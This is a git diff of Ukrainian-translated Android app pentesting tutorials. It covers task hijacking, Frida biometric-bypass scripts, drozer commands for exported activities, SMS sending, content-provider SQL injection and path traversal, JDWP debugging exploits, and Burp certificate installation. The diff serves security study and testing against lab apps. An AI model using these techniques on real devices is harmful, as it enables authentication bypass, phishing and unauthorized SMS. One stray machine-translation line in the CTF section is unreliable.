
@ -4,40 +4,40 @@
## Завдання, стек назад та активності на передньому плані
В Android, **task** - це, по суті, набір активностей, з якими користувачі взаємодіють для виконання конкретної роботи, організованих у **back stack**. Цей стек упорядковує активності на основі того, коли вони були відкриті, з найновішою активністю, що відображається вгорі як **foreground activity**. У будь-який момент часу лише ця активність видима на екрані, що робить її частиною **foreground task**.
В Android, **завдання** - це, по суті, набір активностей, з якими користувачі взаємодіють для виконання конкретної роботи, організованих у **стек назад**. Цей стек упорядковує активності на основі того, коли вони були відкриті, причому найновіша активність відображається вгорі як **активність на передньому плані**. У будь-який момент часу лише ця активність видима на екрані, що робить її частиною **завдання на передньому плані**.
Ось швидкий огляд переходів між активностями:
- **Activity 1** починається як єдина активність на передньому плані.
- Запуск **Activity 2** переміщує **Activity 1** у стек назад, виводячи **Activity 2** на передній план.
- Запуск **Activity 3** переміщує **Activity 1** та **Activity 2** далі назад у стеку, з **Activity 3** тепер спереду.
- Закриття **Activity 3** повертає **Activity 2** на передній план, демонструючи спрощений механізм навігації завдань Android.
- **Активність 1** починається як єдина активність на передньому плані.
- Запуск **Активності 2** переміщує **Активність 1** у стек назад, виводячи **Активність 2** на передній план.
- Запуск **Активності 3** переміщує **Активність 1** та **Активність 2** далі назад у стеку, з **Активністю 3** тепер спереду.
- Закриття **Активності 3** повертає **Активність 2** на передній план, демонструючи спрощений механізм навігації завданнями в Android.
![https://developer.android.com/images/fundamentals/diagram_backstack.png](<../../images/image (698).png>)
## Атака на афінність завдань
## Атака на афінність завдання
### Огляд афінності завдань та режимів запуску
### Огляд афінності завдання та режимів запуску
В Android-додатках, **task affinity** вказує на переважне завдання активності, зазвичай відповідне назві пакета програми. Ця настройка є важливою для створення демонстраційного додатку (PoC) для демонстрації атаки.
В Android-додатках, **афінність завдання** вказує на переважне завдання активності, зазвичай відповідне назві пакета додатка. Ця настройка є важливою для створення демонстраційного додатка (PoC) для демонстрації атаки.
### Режими запуску
Атрибут `launchMode` визначає обробку екземплярів активностей у завданнях. Режим **singleTask** є ключовим для цієї атаки, визначаючи три сценарії на основі існуючих екземплярів активностей та відповідностей афінності завдань. Експлуатація базується на здатності додатку зловмисника імітувати афінність завдання цільового додатку, вводячи в оману систему Android, щоб запустити додаток зловмисника замість цільового.
Атрибут `launchMode` визначає обробку екземплярів активностей у завданнях. Режим **singleTask** є ключовим для цієї атаки, визначаючи три сценарії на основі існуючих екземплярів активностей та відповідностей афінності завдання. Експлуатація базується на здатності додатка зловмисника імітувати афінність завдання цільового додатка, вводячи в оману систему Android, щоб запустити додаток зловмисника замість цільового.
### Детальні кроки атаки
1. **Встановлення шкідливого додатку**: Жертва встановлює додаток зловмисника на своєму пристрої.
1. **Встановлення шкідливого додатка**: Жертва встановлює додаток зловмисника на своєму пристрої.
2. **Початкова активація**: Жертва спочатку відкриває шкідливий додаток, готуючи пристрій до атаки.
3. **Спроба запуску цільового додатку**: Жертва намагається відкрити цільовий додаток.
4. **Виконання захоплення**: Завдяки відповідності афінності завдань, шкідливий додаток запускається замість цільового додатку.
3. **Спроба запуску цільового додатка**: Жертва намагається відкрити цільовий додаток.
4. **Виконання захоплення**: Завдяки відповідності афінності завдання, шкідливий додаток запускається замість цільового додатка.
5. **Оману**: Шкідливий додаток показує фальшивий екран входу, що нагадує цільовий додаток, обманюючи користувача на введення чутливої інформації.
Для практичної реалізації цієї атаки зверніться до репозиторію Task Hijacking Strandhogg на GitHub: [Task Hijacking Strandhogg](https://github.com/az0mb13/Task_Hijacking_Strandhogg).
### Заходи запобігання
Щоб запобігти таким атакам, розробники можуть встановити `taskAffinity` на порожній рядок і вибрати режим запуску `singleInstance`, забезпечуючи ізоляцію свого додатку від інших. Налаштування функції `onBackPressed()` пропонує додатковий захист від захоплення завдань.
Щоб запобігти таким атакам, розробники можуть встановити `taskAffinity` на порожній рядок і вибрати режим запуску `singleInstance`, забезпечуючи ізоляцію свого додатка від інших. Налаштування функції `onBackPressed()` пропонує додатковий захист від захоплення завдань.
## **Посилання**

2
src/mobile-pentesting/android-app-pentesting/apk-decompilers.md
View File

@ -26,7 +26,7 @@
### [Enjarify](https://github.com/Storyyeller/enjarify)
**Enjarify** перетворює Dalvik байт-код у Java байт-код, що дозволяє інструментам аналізу Java більш ефективно аналізувати Android додатки.
**Enjarify** перетворює Dalvik байт-код у Java байт-код, що дозволяє Java інструментам аналізувати Android додатки більш ефективно.
- Щоб використовувати Enjarify, запустіть: `enjarify app.apk` Це генерує еквівалент Java байт-коду наданого APK.

8
src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md
View File

@ -121,7 +121,7 @@ Revision: 4
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\avdmanager.bat -v create avd -k "system-images;android-28;google_apis;x86_64" -n "AVD9" -d "Nexus 5X"
```
В останній команді **я створив VM з ім'ям** "_AVD9_" за допомогою **пристрою** "_Nexus 5X_" та **Android-образу** "_system-images;android-28;google_apis;x86_64_".\
В останній команді **я створив ВМ з ім'ям** "_AVD9_" за допомогою **пристрою** "_Nexus 5X_" та **образу Android** "_system-images;android-28;google_apis;x86_64_".\
Тепер ви можете **переглянути віртуальні машини**, які ви створили за допомогою:
```bash
C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\bin\avdmanager.bat list avd
@ -178,7 +178,7 @@ C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\emulator.exe -avd "AVD9" -ht
- `-screen {touch(default)|multi-touch|o-touch}` : Встановити емуляцію режиму сенсорного екрану.
- **`-writable-system`** : Використовуйте цю опцію, щоб мати записуваний образ системи під час вашої сесії емуляції. Вам також потрібно буде виконати `adb root; adb remount`. Це дуже корисно для встановлення нового сертифіката в систему.
## Рутування пристрою Play Store
## Рутування пристрою з Play Store
Якщо ви завантажили пристрій з Play Store, ви не зможете отримати root безпосередньо, і ви отримаєте це повідомлення про помилку
```
@ -189,7 +189,7 @@ adbd cannot run as root in production builds
## Встановлення сертифіката Burp
Перевірте наступну сторінку, щоб дізнатися, як встановити власний сертифікат CA:
Перевірте наступну сторінку, щоб дізнатися, як встановити власний CA сертифікат:
{{#ref}}
install-burp-certificate.md
@ -199,7 +199,7 @@ install-burp-certificate.md
### Зробити знімок
Ви можете **використовувати GUI**, щоб зробити знімок VM у будь-який час:
Ви можете **використовувати GUI** для створення знімка віртуальної машини в будь-який час:
![](<../../images/image (234).png>)

10
src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md
View File

@ -4,7 +4,7 @@
## **Method 1 Bypassing with No Crypto Object Usage**
Основна увага тут приділяється _onAuthenticationSucceeded_ зворотному виклику, який є критично важливим у процесі аутентифікації. Дослідники з WithSecure розробили [Frida script](https://github.com/WithSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js), що дозволяє обійти NULL _CryptoObject_ в _onAuthenticationSucceeded(...)_. Скрипт примусово виконує автоматичне обхід аутентифікації за відбитком пальця під час виклику методу. Нижче наведено спрощений фрагмент, що демонструє обхід у контексті Android Fingerprint, повна програма доступна на [GitHub](https://github.com/St3v3nsS/InsecureBanking).
Увага тут зосереджена на _onAuthenticationSucceeded_ зворотному виклику, який є критично важливим у процесі аутентифікації. Дослідники з WithSecure розробили [Frida script](https://github.com/WithSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass.js), що дозволяє обійти NULL _CryptoObject_ у _onAuthenticationSucceeded(...)_. Скрипт примусово виконує автоматичне обхід аутентифікації за відбитком пальця під час виклику методу. Нижче наведено спрощений фрагмент, що демонструє обхід у контексті Android Fingerprint, повна програма доступна на [GitHub](https://github.com/St3v3nsS/InsecureBanking).
```javascript
biometricPrompt = new BiometricPrompt(this, executor, new BiometricPrompt.AuthenticationCallback() {
@Override
@ -19,11 +19,13 @@ frida -U -f com.generic.insecurebankingfingerprint --no-pause -l fingerprint-byp
```
## **Метод 2 Підхід обробки виключень**
Ще один [Frida script](https://github.com/WithSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass-via-exception-handling.js) від WithSecure вирішує проблему обходу використання небезпечних криптооб'єктів. Скрипт викликає _onAuthenticationSucceeded_ з _CryptoObject_, який не був авторизований за допомогою відбитка пальця. Якщо додаток намагається використовувати інший об'єкт шифрування, це викличе виключення. Скрипт готується викликати _onAuthenticationSucceeded_ і обробляти _javax.crypto
Ще один [Frida script](https://github.com/WithSecureLABS/android-keystore-audit/blob/master/frida-scripts/fingerprint-bypass-via-exception-handling.js) від WithSecure вирішує проблему обходу використання небезпечних криптооб'єктів. Скрипт викликає _onAuthenticationSucceeded_ з _CryptoObject_, який не був авторизований за допомогою відбитка пальця. Якщо додаток намагається використовувати інший об'єкт шифрування, це викличе виключення. Скрипт готується викликати _onAuthenticationSucceeded_ і обробляти _javax.crypto.IllegalBlockSizeException_ у класі _Cipher_, забезпечуючи, щоб наступні об'єкти, що використовуються додатком, були зашифровані новим ключем.
Команда для запуску скрипта Frida:
```bash
frida -U -f com.generic.insecurebankingfingerprint --no-pause -l fingerprint-bypass-via-exception-handling.js
```
Після досягнення екрану відбитків пальців та ініціації `authenticate()`, введіть `bypass()` у консолі Frida, щоб активувати обхід:
Після того, як ви досягнете екрану відбитків пальців і ініціюєте `authenticate()`, введіть `bypass()` у консолі Frida, щоб активувати обхід:
```
Spawning com.generic.insecurebankingfingerprint...
[Android Emulator 5554::com.generic.insecurebankingfingerprint]-> Hooking BiometricPrompt.authenticate()...
@ -47,7 +49,7 @@ frida -U -l script-to-bypass-authentication.js --no-pause -f com.generic.in
Інструменти реверс-інжинірингу, такі як `APKTool`, `dex2jar` та `JD-GUI`, можуть бути використані для декомпіляції Android-додатку, читання його вихідного коду та розуміння його механізму аутентифікації. Кроки зазвичай включають:
1. **Декомпіляція APK**: Перетворення файлу APK у більш зрозумілий формат (наприклад, Java-код).
2. **Аналіз коду**: Пошук реалізації аутентифікації за відбитками пальців та виявлення потенційних вразливостей (наприклад, механізмів резервного копіювання або неналежних перевірок).
2. **Аналіз коду**: Пошук реалізації аутентифікації за відбитками пальців та виявлення потенційних вразливостей (наприклад, механізмів резервного копіювання або неналежних перевірок валідації).
3. **Рекомпіляція APK**: Після модифікації коду для обходу аутентифікації за відбитками пальців, додаток рекомпілюється, підписується та встановлюється на пристрій для тестування.
## **Метод 5 Використання спеціалізованих інструментів аутентифікації**

8
src/mobile-pentesting/android-app-pentesting/content-protocol.md
View File

@ -12,7 +12,7 @@ $ content query --uri content://media/external/file
```bash
$ content query --uri content://media/external/file --projection _id,_data
```
Контент-провайдери ізольовані у власному приватному просторі імен. Доступ до провайдера вимагає специфічного `content://` URI. Інформацію про шляхи доступу до провайдера можна отримати з маніфестів додатків або вихідного коду фреймворку Android.
Контент-провайдери ізольовані у власному приватному просторі імен. Доступ до провайдера вимагає специфічного `content://` URI. Інформацію про шляхи доступу до провайдера можна отримати з маніфестів додатків або з вихідного коду фреймворку Android.
### Доступ Chrome до контент-провайдерів
@ -40,11 +40,11 @@ content query --uri content://media/external/file --projection _id,_data | grep
```
### Chrome CVE-2020-6516: Обхід політики однакового походження
Політика _однакового походження_ (SOP) є протоколом безпеки в браузерах, який обмежує веб-сторінки у взаємодії з ресурсами з різних походжень, якщо це не дозволено явно політикою Cross-Origin-Resource-Sharing (CORS). Ця політика має на меті запобігти витоку інформації та підробці міжсайтових запитів. Chrome вважає `content://` локальною схемою, що передбачає більш суворі правила SOP, де кожен URL локальної схеми розглядається як окреме походження.
Політика _Одинкових Походжень_ (SOP) є протоколом безпеки в браузерах, який обмежує веб-сторінки у взаємодії з ресурсами з різних походжень, якщо це не дозволено явно політикою Cross-Origin-Resource-Sharing (CORS). Ця політика має на меті запобігти витоку інформації та підробці міжсайтових запитів. Chrome вважає `content://` локальною схемою, що передбачає більш суворі правила SOP, де кожен URL локальної схеми розглядається як окреме походження.
Однак CVE-2020-6516 була вразливістю в Chrome, яка дозволяла обійти правила SOP для ресурсів, завантажених через URL `content://`. Фактично, JavaScript-код з URL `content://` міг отримувати доступ до інших ресурсів, завантажених через URL `content://`, що становило значну загрозу безпеці, особливо на пристроях Android, що працюють на версіях раніше Android 10, де не було реалізовано обмежене зберігання.
Однак CVE-2020-6516 була вразливістю в Chrome, яка дозволяла обійти правила SOP для ресурсів, завантажених через URL `content://`. Фактично, JavaScript код з URL `content://` міг отримувати доступ до інших ресурсів, завантажених через URL `content://`, що становило значну загрозу безпеці, особливо на пристроях Android, що працюють на версіях раніше Android 10, де не було реалізовано обмежене зберігання.
Нижче наведено доказ концепції, який демонструє цю вразливість, де HTML-документ, після завантаження під **/sdcard** та додавання до Media Store, використовує `XMLHttpRequest` у своєму JavaScript для доступу та відображення вмісту іншого файлу в Media Store, обходячи правила SOP.
Нижче наведено доказ концепції, який демонструє цю вразливість, де HTML документ, після завантаження під **/sdcard** та додавання до Media Store, використовує `XMLHttpRequest` у своєму JavaScript для доступу та відображення вмісту іншого файлу в Media Store, обходячи правила SOP.
Proof-of-Concept HTML:
```xml

14
src/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md
View File

@ -40,7 +40,7 @@ drozer console connect
## Цікаві команди
| **Команди** | **Опис** |
| --------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------ |
| --------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------- |
| **Help MODULE** | Показує допомогу вибраного модуля |
| **list** | Показує список усіх модулів drozer, які можна виконати в поточній сесії. Це приховує модулі, які ви не маєте відповідних прав для виконання. |
| **shell** | Запускає інтерактивну оболонку Linux на пристрої в контексті Агенту. |
@ -95,8 +95,8 @@ Attack Surface:
2 services exported
is debuggable
```
- **Дії**: Можливо, ви можете розпочати дію та обійти певний вид авторизації, яка повинна заважати вам її запускати.
- **Постачальники контенту**: Можливо, ви можете отримати доступ до приватних даних або експлуатувати певну вразливість (SQL Injection або Path Traversal).
- **Дії**: Можливо, ви можете розпочати дію та обійти якусь авторизацію, яка повинна заважати вам її запускати.
- **Постачальники контенту**: Можливо, ви можете отримати доступ до приватних даних або експлуатувати якусь вразливість (SQL Injection або Path Traversal).
- **Сервіси**:
- **is debuggable**: [Дізнатися більше](./#is-debuggeable)
@ -117,7 +117,7 @@ com.mwr.example.sieve.PWList
```
**Почати активність**:
Можливо, ви можете почати активність і обійти якусь авторизацію, яка повинна заважати вам її запустити.
Можливо, ви можете почати активність і обійти якийсь вид авторизації, яка повинна заважати вам її запускати.
```bash
dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
```
@ -214,9 +214,9 @@ app.broadcast.info Get information about broadcast receivers
app.broadcast.send Send broadcast using an intent
app.broadcast.sniff Register a broadcast receiver that can sniff particular intents
```
#### Надіслати повідомлення
#### Відправити повідомлення
У цьому прикладі, зловживаючи [FourGoats apk](https://github.com/linkedin/qark/blob/master/tests/goatdroid.apk) Content Provider, ви можете **надіслати довільне SMS** на будь-який непреміум-адресат **без запиту** дозволу у користувача.
У цьому прикладі, зловживаючи [FourGoats apk](https://github.com/linkedin/qark/blob/master/tests/goatdroid.apk) Content Provider, ви можете **відправити довільне SMS** на будь-який непреміумний номер **без запиту** дозволу у користувача.
![](<../../../images/image (415).png>)
@ -229,7 +229,7 @@ run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --compo
### Чи є можливість налагодження
Продуктова APK ніколи не повинна бути налагоджуваною.\
Це означає, що ви можете **підключити java налагоджувач** до працюючого додатку, перевірити його в режимі виконання, встановити точки зупинки, крок за кроком, збирати значення змінних і навіть змінювати їх. [InfoSec institute має відмінну статтю](../exploiting-a-debuggeable-applciation.md) про те, як глибше дослідити, коли ваш додаток є налагоджуваним і впроваджувати код під час виконання.
Це означає, що ви можете **підключити java налагоджувач** до запущеного додатку, перевірити його в режимі виконання, встановити точки зупинки, крок за кроком, збирати значення змінних і навіть змінювати їх. [InfoSec institute має відмінну статтю](../exploiting-a-debuggeable-applciation.md) про те, як заглибитися, коли ваш додаток є налагоджуваним і впроваджувати код під час виконання.
Коли додаток є налагоджуваним, він з'явиться в Маніфесті:
```xml

16
src/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
View File

@ -6,7 +6,7 @@
## Вступ
Дані **постачаються з одного додатку до інших** за запитом компонента, відомого як **постачальник контенту**. Ці запити керуються через методи класу **ContentResolver**. Постачальники контенту можуть зберігати свої дані в різних місцях, таких як **база даних**, **файли** або через **мережу**.
Дані **постачаються з одного додатку до інших** за запитом компонента, відомого як **постачальник контенту**. Ці запити керуються через методи **ContentResolver class**. Постачальники контенту можуть зберігати свої дані в різних місцях, таких як **база даних**, **файли** або через **мережу**.
У файлі _Manifest.xml_ декларація постачальника контенту є обов'язковою. Наприклад:
```xml
@ -16,7 +16,7 @@
```
Щоб отримати доступ до `content://com.mwr.example.sieve.DBContentProvider/Keys`, необхідно мати дозвіл `READ_KEYS`. Цікаво відзначити, що шлях `/Keys/` доступний у наступному розділі, який не захищений через помилку розробника, який захистив `/Keys`, але оголосив `/Keys/`.
**Можливо, ви зможете отримати доступ до приватних даних або використати якусь вразливість (SQL Injection або Path Traversal).**
**Можливо, ви зможете отримати доступ до приватних даних або експлуатувати якусь вразливість (SQL Injection або Path Traversal).**
## Отримати інформацію з **вразливих провайдерів контенту**
```
@ -40,7 +40,7 @@ Content Provider: com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
```
Можливо зібрати інформацію про те, як досягти **DBContentProvider**, починаючи URI з “_content://_”. Цей підхід базується на висновках, отриманих під час використання Drozer, де ключова інформація знаходилася в _/Keys_ каталозі.
Можливо зібрати інформацію про те, як дістатися до **DBContentProvider**, починаючи URI з “_content://_”. Цей підхід базується на висновках, отриманих під час використання Drozer, де ключова інформація знаходилася в _/Keys_ каталозі.
Drozer може **вгадувати та пробувати кілька URI**:
```
@ -66,10 +66,10 @@ content://com.mwr.example.sieve.DBContentProvider/Passwords/
## **Content Providers на основі бази даних**
Ймовірно, більшість Content Providers використовуються як **інтерфейс** для **бази даних**. Тому, якщо ви можете отримати до неї доступ, ви зможете **витягувати, оновлювати, вставляти та видаляти** інформацію.\
Ймовірно, більшість Content Providers використовуються як **інтерфейс** для **бази даних**. Тому, якщо ви можете отримати доступ до неї, ви зможете **витягувати, оновлювати, вставляти та видаляти** інформацію.\
Перевірте, чи можете ви **отримати доступ до чутливої інформації** або спробуйте змінити її, щоб **обійти механізми авторизації**.
Перевіряючи код Content Provider, **зверніть увагу** також на **функції**, названі як: _query, insert, update і delete_:
Перевіряючи код Content Provider, **погляньте** також на **функції**, названі як: _query, insert, update та delete_:
![](<../../../images/image (887).png>)
@ -95,7 +95,7 @@ email: incognitoguy50@gmail.com
![](<../../../images/image (173).png>)
_Зверніть увагу, що при вставці та оновленні ви можете використовувати --string для вказівки рядка, --double для вказівки дійсного числа, --float, --integer, --long, --short, --boolean_
_Зверніть увагу, що при вставці та оновленні ви можете використовувати --string для позначення рядка, --double для позначення дійсного числа, --float, --integer, --long, --short, --boolean_
### Оновити вміст
@ -162,12 +162,12 @@ dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc
```
### **Перехід по шляху**
Якщо ви можете отримати доступ до файлів, ви можете спробувати зловживати Перехідом по шляху (в даному випадку це не є необхідним, але ви можете спробувати використовувати "_../_" та подібні трюки).
Якщо ви можете отримати доступ до файлів, ви можете спробувати зловживати Перехідом по шляху (в цьому випадку це не є необхідним, але ви можете спробувати використовувати "_../_" та подібні трюки).
```
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
```
**Автоматичне виявлення обходу шляхів за допомогою Drozer**
**Автоматичне виявлення обходу шляху за допомогою Drozer**
```
dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...

10
src/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md
View File

@ -69,17 +69,17 @@
## **Підготовка налаштувань**
- Процес передбачав ініціювання емулятора, встановлення вразливого додатку та використання `adb jdwp` для виявлення портів Dalvik VM, які слухають.
- Процес передбачав ініціювання емулятора, встановлення вразливого додатку та використання `adb jdwp` для ідентифікації портів Dalvik VM, які слухають.
- JDWP (Java Debug Wire Protocol) дозволяє налагоджувати додаток, що працює в VM, відкриваючи унікальний порт.
- Портове перенаправлення було необхідним для віддаленого налагодження, після чого JDB було прикріплено до цільового додатку.
- Портове перенаправлення було необхідним для віддаленого налагодження, після чого JDB було підключено до цільового додатку.
## **Впровадження коду під час виконання**
- Експлуатація проводилася шляхом встановлення точок зупинки та контролю потоку виконання додатку.
- Експлуатація була здійснена шляхом встановлення точок зупинки та контролю за потоком виконання додатку.
- Команди, такі як `classes` та `methods <class_name>`, використовувалися для виявлення структури додатку.
- Точка зупинки була встановлена в методі `onClick`, і її виконання контролювалося.
- Команди `locals`, `next` та `set` використовувалися для перевірки та модифікації локальних змінних, зокрема зміни повідомлення "Try Again" на "Hacked".
- Модифікований код виконувався за допомогою команди `run`, успішно змінюючи вихідні дані додатку в реальному часі.
- Команди `locals`, `next` та `set` використовувалися для перевірки та зміни локальних змінних, зокрема зміни повідомлення "Try Again" на "Hacked".
- Модифікований код був виконаний за допомогою команди `run`, успішно змінивши вихідні дані додатку в реальному часі.
Цей приклад продемонстрував, як можна маніпулювати поведінкою налагоджуваного додатку, підкреслюючи потенціал для більш складних експлуатацій, таких як отримання доступу до оболонки на пристрої в контексті додатку.

15
src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md
View File

@ -2,7 +2,6 @@
{{#include ../../../banners/hacktricks-training.md}}
## Встановлення
Встановіть **frida tools**:
@ -26,23 +25,23 @@ frida-ps -U | grep -i <part_of_the_package_name> #Get all the package name
**З**: [https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1](https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1)\
**APK**: [https://github.com/t0thkr1s/frida-demo/releases](https://github.com/t0thkr1s/frida-demo/releases)\
**Джерельний код**: [https://github.com/t0thkr1s/frida-demo](https://github.com/t0thkr1s/frida-demo)
**Джерело коду**: [https://github.com/t0thkr1s/frida-demo](https://github.com/t0thkr1s/frida-demo)
**Слідуйте [посиланню, щоб прочитати це](frida-tutorial-1.md).**
**Слідуйте за [посиланням, щоб прочитати це](frida-tutorial-1.md).**
### [Туторіал 2](frida-tutorial-2.md)
**З**: [https://11x256.github.io/Frida-hooking-android-part-2/](https://11x256.github.io/Frida-hooking-android-part-2/) (Частини 2, 3 та 4)\
**APK та джерельний код**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples)
**APK та джерело коду**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples)
**Слідуйте [посиланню, щоб прочитати це.](frida-tutorial-2.md)**
**Слідуйте за [посиланням, щоб прочитати це.](frida-tutorial-2.md)**
### [Туторіал 3](owaspuncrackable-1.md)
**З**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\
**APK**: [https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level_01/UnCrackable-Level1.apk)
**Слідуйте [посиланню, щоб прочитати це](owaspuncrackable-1.md).**
**Слідуйте за [посиланням, щоб прочитати це](owaspuncrackable-1.md).**
**Ви можете знайти більше чудових скриптів Frida тут:** [**https://codeshare.frida.re/**](https://codeshare.frida.re)
@ -84,7 +83,7 @@ return false;
};
});
```
Підключити java `exit()`
Перехоплення java `exit()`
```javascript
var sysexit = Java.use("java.lang.System")
sysexit.exit.overload("int").implementation = function (var_0) {
@ -117,7 +116,7 @@ var ret = this.onCreate.overload("android.os.Bundle").call(this, var_0)
```
### Хукання функцій з параметрами та отримання значення
Хукання функції розшифрування. Виведіть вхідні дані, викличте оригінальну функцію для розшифрування вхідних даних і, нарешті, виведіть відкриті дані:
Хукання функції розшифровки. Виведіть вхідні дані, викличте оригінальну функцію для розшифровки вхідних даних, а потім виведіть відкриті дані:
```javascript
function getString(data) {
var ret = ""

2
src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md
View File

@ -49,7 +49,7 @@ return true
```
python hooking.py hook1.js
```
Дивіться: Функція приймає параметром рядок, чи не потрібно перевантаження?
Дивіться: Функція приймає параметром рядок, чи потрібно перевантаження?
## Hook 2 - Брутфорс функції

2
src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md
View File

@ -108,7 +108,7 @@ script.exports.hooksecretfunction()
```
Команда "**1**" **вийде**, команда "**2**" знайде і **екземпляр класу та викличе приватну функцію** _**secret()**_, а команда "**3**" **перехопить** функцію _**secret()**_, щоб вона **повертала** **інший рядок**.
Отже, якщо ви викликаєте "**2**", ви отримаєте **справжній секрет**, але якщо ви спочатку викликаєте "**3**", а потім "**2**", ви отримаєте **фальшивий секрет**.
Отже, якщо ви викликаєте "**2**", ви отримаєте **справжній секрет**, але якщо ви спочатку викликаєте "**3**", а потім "**2**", ви отримаєте **підроблений секрет**.
### JS
```javascript

16
src/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md
View File

@ -6,11 +6,11 @@
## **Вступ**
**objection - Дослідження мобільних додатків в реальному часі**
**objection - Дослідження мобільних додатків в режимі виконання**
[**Objection**](https://github.com/sensepost/objection) - це набір інструментів для дослідження мобільних додатків в реальному часі, що працює на базі [Frida](https://www.frida.re). Він був створений з метою допомогти оцінити мобільні додатки та їхню безпеку без необхідності використовувати пристрій з джейлбрейком або рутом.
[**Objection**](https://github.com/sensepost/objection) - це набір інструментів для дослідження мобільних додатків в режимі виконання, що працює на базі [Frida](https://www.frida.re). Він був створений з метою допомогти оцінити мобільні додатки та їхню безпеку без необхідності використовувати пристрій з джейлбрейком або рут-доступом.
**Примітка:** Це не є формою обходу джейлбрейку / руту. Використовуючи `objection`, ви все ще обмежені всіма обмеженнями, накладеними відповідним пісочницею, з якою ви стикаєтеся.
**Примітка:** Це не є формою обходу джейлбрейку / рут-доступу. Використовуючи `objection`, ви все ще обмежені всіма обмеженнями, накладеними відповідним пісочницею, з якою ви стикаєтеся.
### Резюме
@ -97,7 +97,7 @@ android hooking list activities
android hooking list services
android hooking list receivers
```
Frida видасть помилку, якщо нічого не знайдено
Frida запустить помилку, якщо нічого не знайдено
#### Отримання поточної активності
```bash
@ -121,7 +121,7 @@ android hooking search methods asvid.github.io.fridaapp MainActivity
```
![](<../../../images/image (929).png>)
#### Перелік оголошених методів класу з їх параметрами
#### Перелік оголошених методів класу з їхніми параметрами
Давайте з'ясуємо, які параметри потрібні методам класу:
```bash
@ -163,13 +163,13 @@ android hooking watch class asvid.github.io.fridaapp.MainActivity --dump-args --
![](<../../../images/image (883).png>)
Тепер, якщо ви введете будь-що в текстове поле для PIN-коду, ви побачите, що все є дійсним:
Тепер, якщо ви введете будь-що в текстове поле для PIN-коду, ви побачите, що будь-що є дійсним:
![](<../../../images/image (228).png>)
### Екземпляри класу
Шукайте та виводьте **живі екземпляри конкретного Java класу**, вказаного повністю кваліфікованим ім'ям класу. Ось результат спроби отримати значення рядка для виявленого objection, яке зазвичай **містить значення властивостей для об'єкта**.
Шукайте та друкуйте **живі екземпляри конкретного Java класу**, вказаного повністю кваліфікованим ім'ям класу. Ось результат спроби отримати значення рядка для виявленого objection, яке зазвичай **містить значення властивостей для об'єкта**.
```
android heap print_instances <class>
```
@ -185,7 +185,7 @@ android intent launch_service
```
### Пам'ять
#### Дамп
#### Вивантаження
```bash
memory dump all <local destination> #Dump all memory
memory dump from_base <base_address> <size_to_dump> <local_destination> #Dump a part

8
src/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md
View File

@ -18,15 +18,15 @@
Схоже, що функція, яка буде друкувати прапор, це **m().**
## **Smali зміни**
## **Зміни Smali**
### **Виклик m() вперше**
Давайте зробимо так, щоб додаток викликав m(), якщо змінна _this.o != 1000000_. Для цього просто змініть умову:
Давайте зробимо так, щоб додаток викликав m(), якщо змінна _this.o != 1000000_, для цього просто змініть умову:
```
if-ne v0, v9, :cond_2
```
Please provide the text you would like me to translate.
Please provide the text you would like translated.
```
if-eq v0, v9, :cond_2
```
@ -56,7 +56,7 @@ if-eq v0, v9, :cond_2
## Рішення
Змусьте програму виконувати цикл 100000 разів, коли ви виграєте вперше. Для цього вам потрібно лише створити цикл **:goto_6** і змусити програму **перейти туди, якщо `this.o`** не дорівнює 100000:
Змусьте програму виконати цикл 100000 разів, коли ви виграєте вперше. Для цього вам потрібно лише створити цикл **:goto_6** і змусити програму **перейти туди, якщо `this.o`** не дорівнює 100000:
![](<../../images/image (1090).png>)

16
src/mobile-pentesting/android-app-pentesting/install-burp-certificate.md
View File

@ -30,9 +30,9 @@ adb reboot #Now, reboot the machine
Якщо ви **отримали root доступ до вашого пристрою за допомогою Magisc** (можливо, емулятора), і ви **не можете виконати** попередні **кроки** для встановлення сертифіката Burp, оскільки **файлова система є тільки для читання** і ви не можете змонтувати її для запису, є інший спосіб.
Пояснено в [**цьому відео**](https://www.youtube.com/watch?v=qQicUW0svB8), вам потрібно:
У [**цьому відео**](https://www.youtube.com/watch?v=qQicUW0svB8) вам потрібно:
1. **Встановити CA сертифікат**: Просто **перетягніть** DER сертифікат Burp, **змінивши розширення** на `.crt` на мобільному, щоб він зберігся в папці Завантаження, і перейдіть до `Встановити сертифікат` -> `CA сертифікат`
1. **Встановити сертифікат CA**: Просто **перетягніть** DER сертифікат Burp, **змінивши розширення** на `.crt` на мобільному, щоб він зберігся в папці Завантаження, і перейдіть до `Встановити сертифікат` -> `CA сертифікат`
<figure><img src="../../images/image (53).png" alt="" width="164"><figcaption></figcaption></figure>
